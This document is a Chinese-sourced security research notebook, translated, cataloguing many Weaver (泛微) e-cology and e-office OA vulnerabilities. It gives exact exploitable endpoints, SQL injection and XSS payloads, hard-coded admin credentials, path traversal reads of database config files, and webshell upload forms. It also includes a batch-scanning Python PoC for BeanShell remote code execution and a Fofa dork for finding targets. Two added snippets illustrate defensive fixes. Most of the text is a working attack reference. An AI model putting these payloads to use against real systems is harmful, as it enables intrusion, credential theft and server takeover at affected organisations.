Security research - 泛微 (Weaver) OA
Endpoints
/login/Login.jsp?logintype=1  # front-end login page (reachable before authentication)
2019
Weaver e-cology OA database configuration information disclosure
Affects versions including but not limited to 8.0 and 9.0
/mobile/dbconfigreader.jsp
2019
Weaver e-cology OA V8/V9 SQL injection (no public PoC found yet)
2019 Weaver e-cology OA remote code execution (bsh.servlet.BshServlet, BeanShell script execution)
Fofa dork: app="泛微-协同办公OA"
Affected versions: including but not limited to 7.0, 8.0, 8.1
/weaver/bsh.servlet.BshServlet/
PoC (single target | batch)
import argparse
import requests

BSH_PATH = "/weaver/bsh.servlet.BshServlet"
RESULT_FILE = "vuln_list.txt"


def verify(url, payload):
    """POST the BeanShell payload to one target; record the host if the script ran."""
    url = url.strip()
    if not url:
        return
    if not url.startswith("http"):
        url = "http://" + url
    furl = url.rstrip("/") + BSH_PATH
    try:
        res = requests.post(furl, data=payload, timeout=10)
    except Exception:
        return
    # The servlet answers 200 with "Error:" in the body when the script fails to
    # evaluate; a 200 without "Error:" means BeanShell executed the script.
    if res.status_code == 200 and "Error:" not in res.text:
        print(furl + " is vulnerable [Verify Success!]")
        with open(RESULT_FILE, "a") as vlist:
            vlist.write(url + "\n")
    # else:
    #     print(str(res.status_code) + "\n" + furl + "\n")


def ecologyexp(urls, mode):
    # bsh.script is evaluated server-side by BeanShell; exec("whoami") runs an OS command
    # and bsh.servlet.output=raw returns its output unformatted.
    payload = {"bsh.script": "exec(\"whoami\")", "bsh.servlet.output": "raw"}
    if str(mode) == "1":          # single target
        verify(urls, payload)
    elif str(mode) == "2":        # batch: one target per line in the given file
        with open(urls) as ufile:
            for url in ufile:
                try:
                    verify(url, payload)
                except Exception as e:
                    print(e)
                    continue


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="e-cology verify",
        epilog="python e-cology-EXP.py -u url -m 1 || python e-cology-EXP.py -ul url.txt -m 2")
    parser.add_argument("--url", "-u", help="single target URL (mode 1)")
    parser.add_argument("--mode", "-m", help="1 = single target, 2 = batch from file", default="1")
    parser.add_argument("--urlList", "-ul", help="file with one target per line (mode 2)")
    parser.add_argument("--level", "-lv", help="unused", default=1)
    args = parser.parse_args()
    with open(RESULT_FILE, "w") as vf:
        vf.write("vuln_list\n")
    try:
        if args.urlList is not None:
            ecologyexp(args.urlList, "2")
        else:
            ecologyexp(args.url, args.mode)
    except Exception as e:
        print(e)
CNVD-2019-34241
/mobile/browser/WorkflowCenterTreeData.jsp
Affected versions
Weaver e-cology OA, JSP edition
Payload (the formids value below is one continuous string; it is wrapped across two lines here):
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%
0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
Defect ID: wooyun-2015-0132247
Title: one generic SQL injection in Weaver OA office system (login required)
Affects 6.0 and 7.0
/workflow/FormBillBrowser.jsp
Parameter: formName, concatenated into SQL without filtering
wooyun-2015-0137850
Weaver OA generic arbitrary file upload getshell (with the vendor's own site as a case)
Affects 6.0, 7.0, 7.100, 8.0 (login required)
/page/maint/common/UserResourceUpload.jsp?dir=/
(1) the upload filter can be bypassed (change the extension: 1.jsp., 1.jspx; 0x00 truncation)
(2) the upload path is controllable
payload:
<form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
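Added example (not from the original write-up and not Weaver's code): the three filename tricks in (1) and the client-chosen dir in (2) run against a suffix-blacklist check of the kind they defeat, beside an allow-list check that also pins the target inside a fixed upload root. UPLOAD_ROOT and ALLOWED_EXT are assumptions made for the example.

```python
import os

# Assumed storage root and allow-list for the example; Weaver's real values are not on this page.
UPLOAD_ROOT = "/opt/oa/uploads"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "csv"}


def naive_blacklist_blocks(filename):
    """Suffix blacklist of the kind the bypasses above defeat.

    It only inspects the literal tail of the name, so "1.jsp." (trailing dot,
    stripped by Windows when the file is created), "1.jspx" (a second extension
    the servlet container still executes) and "x.jsp\\x00.jpg" (null byte,
    truncated by an older native/Java file API) all get through.
    """
    return filename.lower().endswith(".jsp")


def hardened_accept(filename):
    """Allow-list check: reject control bytes, drop any client-supplied path,
    normalise trailing dots/spaces, then judge only the final extension."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in filename):
        return False                                        # null byte / control characters
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # ignore any directory part
    name = name.rstrip(". ")                                # Windows strips these on create
    if "." not in name:
        return False
    ext = name.rsplit(".", 1)[1].lower()
    return ext in ALLOWED_EXT


def safe_target_path(user_dir, filename):
    """Resolve a client-chosen directory (the dir= parameter above) inside
    UPLOAD_ROOT. Returns the absolute path, or None if the name is rejected or
    the directory escapes the root."""
    if not hardened_accept(filename):
        return None
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].rstrip(". ")
    root = os.path.normpath(UPLOAD_ROOT)
    target = os.path.normpath(os.path.join(root, user_dir.replace("\\", "/").lstrip("/"), name))
    if os.path.commonpath([root, target]) != root:
        return None                                         # dir=../../../../ style traversal
    return target


if __name__ == "__main__":
    for candidate in ("1.jsp.", "1.jspx", "shell.jsp\x00.jpg", "photo.png"):
        print(repr(candidate), "blacklist blocks:", naive_blacklist_blocks(candidate),
              "allow-list accepts:", hardened_accept(candidate))
    print(safe_target_path("/", "photo.png"), safe_target_path("../../../../", "photo.png"))
```

The point of the second check is that it never reasons about what is forbidden: it rewrites the name into a canonical form first and then asks whether what remains is explicitly permitted, which is what makes the trailing-dot, double-extension and null-byte variants all land on the same answer.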
wooyun-2015-0140003
Weaver OA generic system, three SQL injections bundled (reproducible on the vendor site, no login required)
(1) /mobile/plugin/loadWfGraph.jsp  // requestid
(2) //ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1  // nodeid
(3) //ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2*  // id
Defect ID: wooyun-2016-0178866
Title: a Weaver OA interface executes arbitrary SQL statements without login (script attached)
/ws, /ws/query?wsdl  XML injection
Defect ID: wooyun-2016-0169872
Title: a Weaver OA flaw allows traversing and manipulating files on the operating system
plugin\ewe\jsp\config.jsp contains hard-coded credentials:
sUsername = "sysadmin";
sPassword = "weaversoft"
(1) /plugin/ewe/admin/default.jsp: create a file 1.txt
(2) delete files outside the intended directory: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../
wooyun-2015-0155705
Weaver OA unauthenticated GetShell
/sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
Webshell is written to: /sysinterface/extpage/ccccc.jsp
The path is controllable:
/sysinterface/codeEdit.jsp?filename=../../ccccc.jsp&filetype=jsp
Webshell is written to: http://url/ccccc.jsp
Defect ID: wooyun-2015-0141834
Title: Yurun Group Weaver OA system, arbitrary form upload to shell
/tools/SWFUpload/upload.jsp
payload:
<form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
Webshell path: http://url/shell.jsp
Defect ID: wooyun-2015-0138725
Title: Weaver OA generic system SQL injection (reproducible on the vendor site, no login required)
/mobile/plugin/PreDownload.jsp  // url parameter, concatenated into SQL without filtering
Defect ID: wooyun-2015-0132258
Title: Weaver OA SQL injection (test script attached)
/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams=  // keywordid, Oracle boolean-based blind
Reflected XSS: /main/login.jsp
Payload: 1'"()&%<ScRiPt >prompt(930551)</ScRiPt>
Defect ID: wooyun-2015-0129483
Title: Weaver OA sensitive file accessible without authorization
/messager/users.data  XML data, base64-encoded (encoding only, not encryption)
Defect ID: wooyun-2015-0127502
Title: a generic Weaver OA injection (no login required)
/web/WebSearchDsp.jsp?key=1  // key
Defect ID: wooyun-2015-0125738
Title: Weaver OA vulnerability bundle
SQL injection (login required)
(1)
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5  // requestid
(2)
/ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018  // reftype
Broken access control (login required)
(1)
/main/main.jsp  Personal information -> upload avatar -> capture the GET request (it can be opened directly in the browser)
/humres/base/uploadavatar.jsp?id=4022141241232  (change id to overwrite another user's avatar)
(2)
/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=<user id>&v=0&fieldName=isclosed  // changes another user's account status (v controls whether the user can log in: the isclosed column of the sysuser table)
Stored XSS (login required)
Personal center -> personal information -> details -> English name
Defect ID: wooyun-2015-0104678 (Weaver OA e-Mobile)
Title: generic injection in a Weaver OA system (5 cases)
Versions 4.5 and 4.6 are injectable: blind / time-based injection
Payload:
-1' OR (8705=8705) AND 'a'='a
Defect ID: wooyun-2014-076191
Title: Weaver OA vulnerability collection 2 (SQL injection / file upload getshell)
0x01: SQL injection, 4 locations
(1)
POST /general/new_mytable/content_list/content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
block_id=1901&body_width=1121&_=  // block_id (POST body)
(2)
/general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46  // ADD_ID
(3)
/general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16  // group_id
(4)
/general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1  // content_id
0x02: file upload leading to getshell
/general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=
// upload a csv, which ends up stored as php
Defect ID: wooyun-2014-074972
Title: Weaver OA vulnerability collection (SQL injection, unauthorized access, etc.)
0x01: broken access control (login required)
(1)
/general/email/new/index.php?EMAIL_ID=7  // EMAIL_ID
(2)
/ikernel/admin/
0x02: SQL injection (login required)
(1)
/ikernel/admin/IK_TABLE/field/?TABLE_ID=9  // TABLE_ID
0x03: file download
/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
0x04: file upload
/general/email/  Internal mail -> new mail -> upload a "php4" file
Verify the shell at /attachment/<partial path found in the page source>/<file name>.php4
Defect ID: wooyun-2014-069288
Title: several back-end injections in Weaver OA (verified on the official demo)
(1)
/systeminfo/sysadmin/sysadminEdit.jsp?id=1  // id, requires admin privileges
(2)
//cowork/CoworkLogView.jsp?id=151  // id, ordinary user privileges
(3)
/system/basedata/basedata_role.jsp?roleid=32  // roleid, ordinary user privileges
(4)
//system/basedata/basedata_hrm.jsp?resourceid=3  // resourceid, ordinary user privileges
Defect ID: wooyun-2013-039855
Title: Weaver E-office OA management system # verifying generality: SQL injection, arbitrary file download, file upload, etc.
(1) phpmyadmin  # reachable without authentication
(2) SQL injection
/general/news/show/read_news.php?NEWS_ID=214%20and%201=2%20union%20select%201,user(),database(),4,5,6  // NEWS_ID
(3) file download
/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843  (Zend-encoded)
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/mysql_config.ini&ATTACHMENT_ID=5402024843
(4) file upload
My homepage -> edit work plan -> attachment upload -> php4
Shell path: /attachment/xxx/shell.php4
Defect ID: WooYun-2015-0124589
Title: a generic Weaver system has SQL injection (no login required)
(1)
/main/login.jsp  username: sysadmin'  -> the database error is echoed back
Captured request:
/j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin'  // j_username
(2)
/ServiceAction/com.eweaver.base.DataAction?sql=%20select%20*%20from%20v$version%20where%20rownum%20=%201  // returns the database version
wooyun-2015-0124788
1. Unauthorized access and arbitrary file traversal
/weaver/weaver.email.FileDownloadLocation?fileid=46&download=1
/weaver/weaver.file.filedownload?fileid=1
2. Injection
/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1  (Weaver OA 7)  // fileid
Defect ID: WooYun-2013-038914
Title: Weaver E-office OA management system has arbitrary file download and file upload leading to arbitrary code execution (getshell confirmed)
File upload
From the source of inc/utility_all.php, attachments are stored at attachment/$ATTACHMENT_ID/$ATTACHMENT_NAME
Personal diary -> upload attachment; read the page source to obtain the ATTACHMENT_ID and ATTACHMENT_NAME values
The configuration file shows that php4 is not among the blocked upload extensions, so a shell can be dropped directly (SYSTEM privileges)
wooyun-2015-0124027 (arbitrary SQL execution)
/ServiceAction/com.eweaver.base.DataAction?sql=select LONGONNAME from SYSUSER where LOGONPASS = '<base64-encoded password>'
applychen (wooyun-2010-034523) Weaver E-office OA management system SQL injection (no further information found)
wooyun-2010-0137042 (no further information found)
Defect ID: wooyun-2016-0215533
Title: Weaver eweaver arbitrary database operation
/ws/query  // the queryBy method of the web service implementation class QueryServiceImpl (query) executes database statements
Defect ID: wooyun-2016-0191882
Title: Weaver ecology SQL injection in all versions (vendor site as the example), part 2
Requires ordinary user privileges
Affected versions:
8.100.0531+KB81001511, 7.100.0331, 5.000.0327+KB50001107, 4.100.0919
Defect ID: wooyun-2016-0198158
Title: Weaver ecology two unauthenticated SQL injections + arbitrary file read
(1) SQL injection
the markId parameter of the SignatureDownLoad class is not filtered
(2) file read
the markPath parameter is controllable
Defect ID: wooyun-2016-0169453
Title: Weaver e-cology collaborative business system SQL injection (verification relay script attached)
//services/  // XML injection
Defect ID: wooyun-2015-0164133
Title: Weaver e-office official site has an odd flaw exposing registrant information and allowing product information to be changed
/eoffice_web/index.php?s=/admin/settings/register.html
/eoffice_web/index.php?s=/admin/update/update_list.html
Defect ID: wooyun-2015-0148980
Title: a generic Weaver system design flaw: directory listing and GetShell (login required)
1. Directory listing
//document/imp/filebrowser.jsp?dir=D:\\
2. File upload (login required)
xxx/base/skin/skincreate.jsp
Shell path: /css/skins/skin4/shell.jsp
Defect ID: wooyun-2015-0141786
Title: unauthenticated SQL injection in Weaver decentralized management (e-cology) (a Fortune 500 company & demo reproduction)
/login/Login.jsp?logintype=1
Capture the login request ->
/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=  // loginid
Defect ID: wooyun-2015-0136818
Title: Weaver e-cology generic, 4 SQL injections
1 Injection point /pweb/careerapply/HrmCareerApplyPerEdit.jsp, parameter id
2 Injection point /pweb/careerapply/HrmCareerApplyPerView.jsp, parameter id
3 Injection point /pweb/careerapply/HrmCareerApplyWorkEdit.jsp, parameter id
4 Injection point /pweb/careerapply/HrmCareerApplyWorkView.jsp, parameter id
5 Injection point /web/careerapply/HrmCareerApplyPerEdit.jsp, parameter id
6 Injection point /web/careerapply/HrmCareerApplyPerView.jsp, parameter id
7 Injection point /web/careerapply/HrmCareerApplyWorkEdit.jsp, parameter id
8 Injection point /web/careerapply/HrmCareerApplyWorkView.jsp
Defect ID: wooyun-2015-0136823
Title: Weaver e-cology generic, 6 SQL injections
1 Injection point /web/broswer/SectorInfoBrowser.jsp, parameter sqlwhere
2 Injection point /web/broswer/CustomerTypeBrowser.jsp, parameter sqlwhere
3 Injection point /web/broswer/CustomerSizeBrowser.jsp, parameter sqlwhere
4 Injection point /web/broswer/CustomerDescBrowser.jsp, parameter sqlwhere
5 Injection point /web/broswer/ContacterTitleBrowser.jsp, parameter sqlwhere
6 Injection point /web/broswer/CityBrowser.jsp, parameter sqlwhere
Defect ID: wooyun-2015-0136828
Title: a Weaver system has a generic injection (vendor site and China Mobile as examples)
(1)
/login.do -> capture the login request, which goes to /verifyLogin.do  // loginid
payload:
loginid: aaa' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a
password: 1
(c4ca4238a0b923820dcc509a6f75849b is md5("1"): the injected loginid matches any account whose password is "1", and the submitted password "1" satisfies the original password comparison that remains at the end of the query)
(2)
/client.do?method=getlist&sessionkey=xxx&module=7&scope=4&pageindex=1&keyword=1  // keyword (login required)
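Added example (not from the report, not Weaver's code): the loginid payload from (1) run against a login query built by string concatenation, beside the same lookup with bound parameters. The users table and its two rows are constructed for the example and do not reflect Weaver's schema.

```python
import hashlib
import sqlite3

# The loginid payload from the entry above; the password submitted alongside it is "1".
PAYLOAD_LOGINID = "aaa' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a"


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_demo_db():
    """Constructed sample table for the example (not Weaver's schema):
    one account with the password "1", one with a strong password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (loginid TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", md5_hex("1")), ("alice", md5_hex("S3cret!pass"))])
    return conn


def login_vulnerable(conn, loginid, password):
    """Query built by string concatenation, the pattern behind the injection above.
    With the payload the WHERE clause becomes
      loginid = 'aaa' OR (password LIKE '<md5("1")>' AND 'a'='a' AND password = '<md5(submitted)>')
    so any row whose password is "1" is returned. Returns the matched loginid or None."""
    sql = ("SELECT loginid FROM users WHERE loginid = '%s' AND password = '%s'"
           % (loginid, md5_hex(password)))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, loginid, password):
    """Same lookup with bound parameters: the quote inside loginid is data, not SQL."""
    sql = "SELECT loginid FROM users WHERE loginid = ? AND password = ?"
    row = conn.execute(sql, (loginid, md5_hex(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_demo_db()
    print(login_vulnerable(db, PAYLOAD_LOGINID, "1"))   # admin
    print(login_vulnerable(db, PAYLOAD_LOGINID, "x"))   # None: the trailing password check still applies
    print(login_fixed(db, PAYLOAD_LOGINID, "1"))        # None
```

The second vulnerable call shows why the report pairs the payload with password 1: the injected OR branch still ends in the application's own password comparison, so the hash in the payload and the submitted password have to agree.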
Defect ID: wooyun-2015-0134994
Title: Weaver e-cology generic SQL injection (script attached)
/web/careerapply/HrmCareerApplyAdd.jsp  // careerid
Defect ID: wooyun-2015-0130759
Title: an OA platform leaks every account's password, including the administrator's, without login (got into Weaver's own management system)
/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER
Defect ID: wooyun-2015-0128007
Title: Weaver eoffice pre-auth getshell + a minor issue (no login required)
(1) SQL injection
/inc/group_user_list/group_xml.php  // par (array-typed parameter, sent base64-encoded)
Payload (plaintext => base64 as sent):
[group]:[1]|[groupid]:[1'] => W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=
[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php'] => W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==
(2) unauthorized access
/UserSelect/main.php
Defect ID: wooyun-2015-0127270
Title: Weaver eoffice two SQL injections bundled + one broken access control (no login required)
(1) SQL injection
/E-mobile/calendar_page.php  // detailid
/E-mobile/diarymy_page.php  // start
Payload (time-based):
1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
(2) broken access control
E-mobile/email_page.php  // detailid
Defect ID: wooyun-2015-0126024
Title: Weaver E-office injection series: unauthenticated injections 1-20 (with vendor site cases)
(1)
/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1  // RUN_ID
(2)
/E-mobile/flowdo_page.php?diff=delete&flowid=1  // flowid
(3)
/E-mobile/flowsorce_page.php?flowid=2  // flowid
(4)
/E-mobile/flownext_page.php?diff=candeal&detailid=2,3  // detailid
(5)
/E-mobile/flowimage_page.php?FLOW_ID=2  // FLOW_ID
(6)
/E-mobile/flowform_page.php?FLOW_ID=2  // FLOW_ID
(7)
/E-mobile/diaryother_page.php?searchword=23  // searchword
(8)
/E-mobile/create/ajax_do.php?diff=word&sortid=1  // sortid
(9)
/E-mobile/create/ajax_do.php?diff=word&idstr=2  // idstr
(10)
/E-mobile/create/ajax_do.php?diff=addr&sortid=1  // sortid
(11)
/E-mobile/create/ajax_do.php?diff=addr&userdept=1  // userdept
(12)
/E-mobile/create/ajax_do.php?diff=addr&userpriv=1  // userpriv
(13)
/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1  // idstr
(14)
/E-mobile/flow/flowhave_page.php?detailid=2,3  // detailid
(15)
/E-mobile/flow/flowtype_free.php?flowid=1  // flowid
(16)
/E-mobile/flow/flowtype_free.php?runid=1  // runid
(17)
/E-mobile/flow/flowtype_other.php?flowid=1  // flowid
(18)
/E-mobile/flow/flowtype_other.php?runid=1  // runid
(19)
/E-mobile/flow/freeflowimage_page.php?fromid=2  // fromid
(20)
/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2  // runid
Defect ID: wooyun-2015-0125638
Title: Weaver Eoffice: multiple arbitrary file reads and multiple arbitrary file uploads in two files, direct getshell
File read (the default read directory is /attachment/, so a single ../ steps up to the web root)
(1)
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
(2)
/iweboffice/officeserver.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../mysql_config.ini
(3)
/iweboffice/officeserver.php?OPTION=GETFILE&REMOTEFILE=../mysql_config.ini
File upload
(1)
/iweboffice/officeserver.php?OPTION=SAVEFILE&FILENAME=shell.php
Shell path: /attachment/shell.php
(2)
/iweboffice/officeserver.php?OPTION=SAVETEMPLATE&TEMPLATE=shell.php
Shell path: /attachment/shell.php
(3) the SAVEASHTML case of officeserver.php
(4) the SAVEIMAGE case
(5) the UPDATEFILE case
(6) the PUTFILE case
(7)
/webservice/upload/upload.php
Payload:
<form action="http://url/webservice/upload/upload.php" enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(8)
/webservice-json/upload/upload.php
(9)
/webservice-xml/upload/upload.php
Defect ID: wooyun-2015-0125592
Title: Weaver Eoffice three arbitrary file uploads, direct getshell
(1)
/webservice/upload.php
Payload:
<form action="http://url/webservice/upload.php" enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(2)
inc/jquery/uploadify/uploadify.php
Payload:
<form action="http://url/inc/jquery/uploadify/uploadify.php" enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>
(3)
/general/weibo/javascript/LazyUploadify/uploadify.php
Payload:
<form action="http://url/general/weibo/javascript/LazyUploadify/uploadify.php" enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>
(4)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?uploadType=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214

-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php

<?php phpinfo();?>
-----------------------------94401197120954--
Shell path: /attachment/shell.php
(5)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?user_ID=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214

-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php

<?php phpinfo();?>
-----------------------------94401197120954--
Shell path: /attachment/personal/$userID/$userID_temp.php
Defect ID: wooyun-2015-0125279
Title: Weaver E-office: multiple SQL injections in one file / user information leak (ROOT SHELL)
//webservice/eoffice.wsdl.php?wsdl  (XML injection)
Defect ID: wooyun-2015-0125286
Title: Weaver e-office arbitrary file download
/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php
Defect ID: wooyun-2015-0125282
Title: Weaver E-office 3 SQL injections (ROOT SHELL) / 2 arbitrary file uploads
XML injection
(1)
webservice-json/login/login.wsdl.php?wsdl
(2)
/webservice/login/login.wsdl.php?wsdl
(3)
//webservice/eoffice.wsdl.php?wsdl
/webservice/eoffice.wsdl.php?wsdl
(4)
/webservice-xml/login/login.wsdl.php?wsdl
File upload
(1)
/webservice/upload.php
Shell path: attachment/$attachmentID  ($attachmentID is echoed in the response)
(2)
/webservice/upload/upload.php
(3)
webservice-json/upload/upload.php
Defect ID: wooyun-2015-0124503
Title: one Weaver Eoffice file has multiple SQL injections and lets the login be bypassed to operate the back end directly
